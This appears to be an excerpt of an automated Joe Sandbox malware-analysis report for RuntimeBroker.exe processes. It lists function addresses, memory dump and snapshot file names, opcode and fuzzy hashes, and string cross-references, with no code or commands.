Function 00007FF848F27AB3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f27000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeeae20edb997eb868dc1153b9b8d9375ec14fff2be02fb0f71e4ff8dedf8a8e
Instruction ID: 65b1301cbe9ed56f685b4371536696ee44911918a1388669124ce864a1564071
Opcode Fuzzy Hash: aeeae20edb997eb868dc1153b9b8d9375ec14fff2be02fb0f71e4ff8dedf8a8e
Instruction Fuzzy Hash: 92F03A35E0851D8BDB18EB98E8914FDB7B5FF98350F50013AD009A3286CF296A068F60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F127CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c66dd18f47e5df79b7a504e0c20a166743a71338a448bc03fb9264f575590e02
Instruction ID: c2a802ca4a76c8bb079f596f28f7caad315acf58caab4118b8df43fb7541799a
Opcode Fuzzy Hash: c66dd18f47e5df79b7a504e0c20a166743a71338a448bc03fb9264f575590e02
Instruction Fuzzy Hash: 7CF0BE3080E78E8FEB59EFA488192B97BA0FF15351F4405BFE809C60D2EB399854C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 693f32c6156efbbeb888949efe4ae0d6f2166c4b5e3abdedecbf942bfa188b7c
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: BDE0ED30E2D9064EEA647318948567461D59F44394FB89675F01CCA1E7EB2DECC6D209

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1BEDE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction ID: defc4fa7df3ef2cd3a5ce3bb9bc7d196cf94a491063300e64575a28793b2a198
Opcode Fuzzy Hash: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction Fuzzy Hash: 8ED04235A1892D8EDF40EB99E8485EDB3B5FB58351F000126D51DD7295DB6068108B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F151AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 7b90d23f94693b1f56b7d88455286942ddf29a1b27883871e7f1333bb1267cad
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: CCE09670D59E1D8EEBB5EB588C54BB9B6B1BB58742F5010EAC00DE2291DE346E809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb27c1767a0b29c842ed06b183725a08e7648e6d2dd1bdfafe8e2d7ea6f2addc
Instruction ID: 1073134cc4782aa135508a4ddf18881deb7f2f67b32aa00856bb44637d5b691c
Opcode Fuzzy Hash: eb27c1767a0b29c842ed06b183725a08e7648e6d2dd1bdfafe8e2d7ea6f2addc
Instruction Fuzzy Hash: 44E0EC30D1A5298EE750FB14C800BAEBAB1FF44344F5001B5D00DA32C2CF386D408F54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1B32B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e4a405752e1b4036dad8ab3b0483ba27e633190ddeb2fe1c345b3e17b1431e2
Instruction ID: a8faaab668e84c048920598a78afcce8cca84767f0631327bd4e039fdcf1fb80
Opcode Fuzzy Hash: 7e4a405752e1b4036dad8ab3b0483ba27e633190ddeb2fe1c345b3e17b1431e2
Instruction Fuzzy Hash: 2ED05E30C1D54A9EDB91F710C851AEAB770EF25340F1442E2800DD2186CF38AEC08F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F18EA7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction ID: 4c369548c7cb7c212b746bae8d309d2ecf7a1807388be650cc210e98c9e3d292
Opcode Fuzzy Hash: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction Fuzzy Hash: C7D06C70A09A298EEBA4EB0488547AAB271FB48342F1005EB840DE72D1EE742E808F04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F21001 Relevance: 7.6, Strings: 6, Instructions: 131COMMON

Download Yara Rule

Strings

", xrefs: 00007FF848F2129E
/, xrefs: 00007FF848F21870
{, xrefs: 00007FF848F21001
&, xrefs: 00007FF848F21A12
", xrefs: 00007FF848F21A67
[, xrefs: 00007FF848F212E4

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "$"$&$/$[${
API String ID: 0-683516320
Opcode ID: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction ID: e604c0cffb783123f601c6e7a70d69cb7de0aefc66999626faa34f681db9c656
Opcode Fuzzy Hash: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction Fuzzy Hash: E651C470D082298EEB68EF95D4947FDB6B1BF58341F1040BAD05EA72C1CB396984DF19

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2199B Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F21870
&, xrefs: 00007FF848F21A12
", xrefs: 00007FF848F21A67
}, xrefs: 00007FF848F219DF

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "$&$/$}
API String ID: 0-3572482012
Opcode ID: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction ID: 212fd6290dc5d1c6ed47dd41f2efd8d49d786c0ddedd04da56bae1675695e2c7
Opcode Fuzzy Hash: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction Fuzzy Hash: A931E074D082298FDBA8EF94D8907FDB7B1FB54341F1045AAD04AAB2D0DB386A84CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RuntimeBroker.exePID: 6648, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F4139C Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F41870
", xrefs: 00007FF848F41602
., xrefs: 00007FF848F415CA

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "$.$/
API String ID: 0-983106565
Opcode ID: e1fee8d76af898af57d7c36ff158311bf5a32696db9e24baec28a4c155df8e17
Instruction ID: d20b68190d05786f384708c74054122d3ee0eac61eb1bfa75cf0c527d2dc2947
Opcode Fuzzy Hash: e1fee8d76af898af57d7c36ff158311bf5a32696db9e24baec28a4c155df8e17
Instruction Fuzzy Hash: 3231D530D186698EEBA8EF54C8947EDB3B1FF64741F1045AAC41DA6291CB745984CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3D9C9 Relevance: 2.9, Strings: 2, Instructions: 397COMMON

Download Yara Rule

Strings

p\H, xrefs: 00007FF848F3DAE2
NH, xrefs: 00007FF848F3DA74

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3d000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: 4cfa90736c6917a0af0d3eb16715859002a979942427f401bacd42fff4913782
Instruction ID: fb8c209486843492fecfe0f2fc7d3dec12f050e9b14b6bb284ffafe85aff6a02
Opcode Fuzzy Hash: 4cfa90736c6917a0af0d3eb16715859002a979942427f401bacd42fff4913782
Instruction Fuzzy Hash: 50E12871D19A5ADFEB98EB68C4957B8B7B1FF58341F0401BAD00ED3292CB386885CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F451BD Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

8mH, xrefs: 00007FF848F452CA

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: 8mH
API String ID: 0-1362847371
Opcode ID: 09889caa7caada9387636fd3e2fd9ac227666eb6768c9c01d070ffb9807ca274
Instruction ID: fec226b6996d29dcb449126fcecce1f3058fe0f07e899f3994ea7753b23fe576
Opcode Fuzzy Hash: 09889caa7caada9387636fd3e2fd9ac227666eb6768c9c01d070ffb9807ca274
Instruction Fuzzy Hash: D7913D70D0894D8FDB94FB68D8996ADBBF1FF28341F1000AAD00DE7296DB746981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32085 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F3210B

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: c3e464afc8d498042e1bb834a81ef721e99b6262d6177b3dc0adc45ec14108a6
Instruction ID: 6b8c2dd069e5ddca291129a3e4813cdbd280f4e0912965b745155a9244c2337f
Opcode Fuzzy Hash: c3e464afc8d498042e1bb834a81ef721e99b6262d6177b3dc0adc45ec14108a6
Instruction Fuzzy Hash: 35412231E0DA4A4FE346FB7898451B8BBE1EF85381F0540BBD40CC71E2DF28A8458355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 96ff8d26925ff2aa9b59931b98b710d79df2b57850e83a291e5af22289d8241d
Instruction ID: 7b94d573adc69a990cdfd46ef5c57a192a8a1a2b710a68141b99203ba277ca50
Opcode Fuzzy Hash: 96ff8d26925ff2aa9b59931b98b710d79df2b57850e83a291e5af22289d8241d
Instruction Fuzzy Hash: 8E116A31D0954E9FEB80FB68D8496BD7BE0FF98380F4005B7D809C6192EF38A5448700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F311FD

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 41914be16aecf2e6f3958c4e0cccf7830c30f66a2994a49ec7e494bdda2cd425
Instruction ID: ed51e1004c1d5ef38c981e0f173e24710c06b8e9206562c8baa798964437d6eb
Opcode Fuzzy Hash: 41914be16aecf2e6f3958c4e0cccf7830c30f66a2994a49ec7e494bdda2cd425
Instruction Fuzzy Hash: 8811BF70D0C64A8FEB5AFB6488692F97BE0FF59341F1404BFD40AD61D1EB285580C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F311A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F311FD

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 9619e6b3be7d06d8e08f29bb2ed19894469f09d1310db910c94a0a2bb3345006
Instruction ID: d24fa57917b696d3540fadcb2b8ae9104da35ce644bd11b784db3c43e7b21b37
Opcode Fuzzy Hash: 9619e6b3be7d06d8e08f29bb2ed19894469f09d1310db910c94a0a2bb3345006
Instruction Fuzzy Hash: 3BF0F070E1CA4E8EFB99BBA498193FA7BE8FF55345F00147BE41AD20C0EF3856948654

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F432E4 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1fb53dd62750110cc97381ac8dc27206d5bb4ec119d9f30c7dd63f2248f54ad
Instruction ID: 3dfc05b0e342b04c1af1738b6403c997aa58215a3c25ec63391746bc75d9a788
Opcode Fuzzy Hash: f1fb53dd62750110cc97381ac8dc27206d5bb4ec119d9f30c7dd63f2248f54ad
Instruction Fuzzy Hash: E8018F3190E2CA8EE752AB3848566B97FB0EF22740F0804F7D448D70D3EA2869488356

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4382F Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f0d1c843c963c97d395748c85f02bb79e0644f65f932c0ba11b5f215b6938e
Instruction ID: ac85fa4fb32c374426643637067720682d3fc9c03e3befc796f6cde8c74eb847
Opcode Fuzzy Hash: 02f0d1c843c963c97d395748c85f02bb79e0644f65f932c0ba11b5f215b6938e
Instruction Fuzzy Hash: ED91382771D42299D701BBBCF8565FA7BA0FF913B5F040537C188CD093DA28608AC7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F316A8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b6f37d601e0b8fa826dcbbdaa0732e42646182229add44b9452086f680fcb7
Instruction ID: 4f83665cb12cabb94c0d36a1d8353e444b12f8179f5c41426c50eccbd4eb6dd3
Opcode Fuzzy Hash: 44b6f37d601e0b8fa826dcbbdaa0732e42646182229add44b9452086f680fcb7
Instruction Fuzzy Hash: BE91BD31A0CA4A8FDB58EF1898515B977E2FF99744F14057AE44DC32C2CE34AC82C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42A87 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3acc5847da1adafab5543892d0c12eb5a37affce6332b266c9689c36fd65e1c8
Instruction ID: 665e06d8f8019739f193d77a04f68f16a304f49c4ca3fba3aafe83a2fbcf6cb4
Opcode Fuzzy Hash: 3acc5847da1adafab5543892d0c12eb5a37affce6332b266c9689c36fd65e1c8
Instruction Fuzzy Hash: 1291A270D1861D8EEBA4EB98C855BEDBBB1FF58340F1041BAD40DE3292DF3469858B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F335FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3306de4a7ed5580c1d627dfdfe5abc6721acebb0d5a82bdd7601feafc9ea6610
Instruction ID: 49532e8c7bbe92dc5d77af3e6f152286c6f26741a252a977da0d2b54c9115683
Opcode Fuzzy Hash: 3306de4a7ed5580c1d627dfdfe5abc6721acebb0d5a82bdd7601feafc9ea6610
Instruction Fuzzy Hash: 3971AC71E1894A9FE784EB6CE8667ADBBE1FB99354F50017AC00DC32C6DBB819018B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d25fe15faa6340078e3760e6cbb6726dfe9bfe84c883f65ab69ded85f420ab9d
Instruction ID: fe5f088bfad6febefadc2c0ab73c48d136d8e29db0134a4ec53058856fafb5a5
Opcode Fuzzy Hash: d25fe15faa6340078e3760e6cbb6726dfe9bfe84c883f65ab69ded85f420ab9d
Instruction Fuzzy Hash: 7551BF31A0CA898FDB48EF1888545BA77E2FB99754F14057EE44AC32C1CF35E882C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F331C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63a0ee8ccb0efb9b7fae850f7b92040f73eacfb34b96cad0b819239eb5b96c0
Instruction ID: c8bcdcd656c56fbcd58827e54212fd845c4ef4bee5179346dbcb3fa3c1e47c82
Opcode Fuzzy Hash: b63a0ee8ccb0efb9b7fae850f7b92040f73eacfb34b96cad0b819239eb5b96c0
Instruction Fuzzy Hash: 9751F570D0964D8EEB54EB98E499AEDBBF1EF58351F10407AD009E72D2DB38A944CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F428DC Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aa53e6c49d41cd35b868b53c71d60a738c6ed4a40e37257b5945b963a935d0f
Instruction ID: cd7ec8f4e4d5593313f44d6b6ab2e922f4d0f12d5bfb7400ae598f65aa8ba6b5
Opcode Fuzzy Hash: 2aa53e6c49d41cd35b868b53c71d60a738c6ed4a40e37257b5945b963a935d0f
Instruction Fuzzy Hash: 6041B570D1861D8FEB94EB58D895BA8BBB1FF59340F4041AAD40DE3292DF346984DB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4267D Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704954fa3398e362554705fcbd5485e07f6964e8c6607382b995370ee284a644
Instruction ID: 135831b59b21d96ba4676b11af40de7189149104e738423e774a48dec69e1b39
Opcode Fuzzy Hash: 704954fa3398e362554705fcbd5485e07f6964e8c6607382b995370ee284a644
Instruction Fuzzy Hash: 57415E30D2965D9FEB44EB98D855AEEB7B1FF58301F10017AD009E3292DF386841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3AE88 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c59a6aeb0c4871bfa285885019712ba0383bb1069b17e13d96bc1051043339
Instruction ID: 610bbad0a048e935c7cf53b42d7c1a0c520698012b97e2c2bccca5141801a726
Opcode Fuzzy Hash: 19c59a6aeb0c4871bfa285885019712ba0383bb1069b17e13d96bc1051043339
Instruction Fuzzy Hash: 4431CD72D0DA8A9FE701AB7988191F97BE0FF15380F0804BBC459C71D2EF28A9948355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BD69 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1826b8985eb4e12e2f0afae223e43d77e74fbe1ee4b72d531a76ff89c70e7e77
Instruction ID: 8341fa3d257dc99def31bb352a3f3fec4b9f76a7b25745749cacb731b5f92fef
Opcode Fuzzy Hash: 1826b8985eb4e12e2f0afae223e43d77e74fbe1ee4b72d531a76ff89c70e7e77
Instruction Fuzzy Hash: 66314570D1D6498FDB54EFA8C8A46EDBBF1EF19300F14017AD009E7291DB38A980CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F322BB Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f801f9dcdb2823cc7035d7019ad5b8b46ea362b86a449409c8e9be19f4e580
Instruction ID: 052471e136289a1c6b163bed5ca6fa5168ab89b155d2f2928096425b39b65581
Opcode Fuzzy Hash: f6f801f9dcdb2823cc7035d7019ad5b8b46ea362b86a449409c8e9be19f4e580
Instruction Fuzzy Hash: 6A41E230D1C6298EEB64AB54C815BECB2B0AF45341F4041BBD45EA22D2DF386A84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F439D3 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 295bbceb9dbc811bb6f711100146fe57650bb4b9fec12643f98263cbd9a58d8c
Instruction ID: 2566bc866767bdc1b1285d6ec2c77d4311d3a6fc37c71a1f3ed3ef50c5cc6553
Opcode Fuzzy Hash: 295bbceb9dbc811bb6f711100146fe57650bb4b9fec12643f98263cbd9a58d8c
Instruction Fuzzy Hash: 8C214736E0D9868EE311BB6CAC1A2F97BA0FF62BA1F040077C148DA093DB6950488795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F332F5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b814eafe601f1e34e31ed5ce2e6e70dfbbd7ddb57e286ca609f39a281de6182
Instruction ID: b2087f7ca18866052ddf9c030a586ab97db97c459cdfa371a6b10f30f2e0d3a2
Opcode Fuzzy Hash: 0b814eafe601f1e34e31ed5ce2e6e70dfbbd7ddb57e286ca609f39a281de6182
Instruction Fuzzy Hash: AE21C070D0891D8FEB94EB98D495AECBBF1FB98341F50416AD00AE7292CB386980DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F333CF Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dab19a684c2bad1651386ad8f61cbafca82953e27f98ab053109eff3e40391c
Instruction ID: 2ecb4784bc8d40270d83ca2e2a1a7dafde932a6b2248f8aef0855aa4a14e3190
Opcode Fuzzy Hash: 9dab19a684c2bad1651386ad8f61cbafca82953e27f98ab053109eff3e40391c
Instruction Fuzzy Hash: 7721593084D68A9FE743EB78C8586A9BFE4FF1A351F0904BBD049C70A2EB389455C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 079fe5840702cd06c6580fd08629126d46ea0cbec6f96fac567fb1898053adb6
Instruction ID: a0af207d54cffcc0bf225933383bc79cca329f9443d68364e93014492ebbdc47
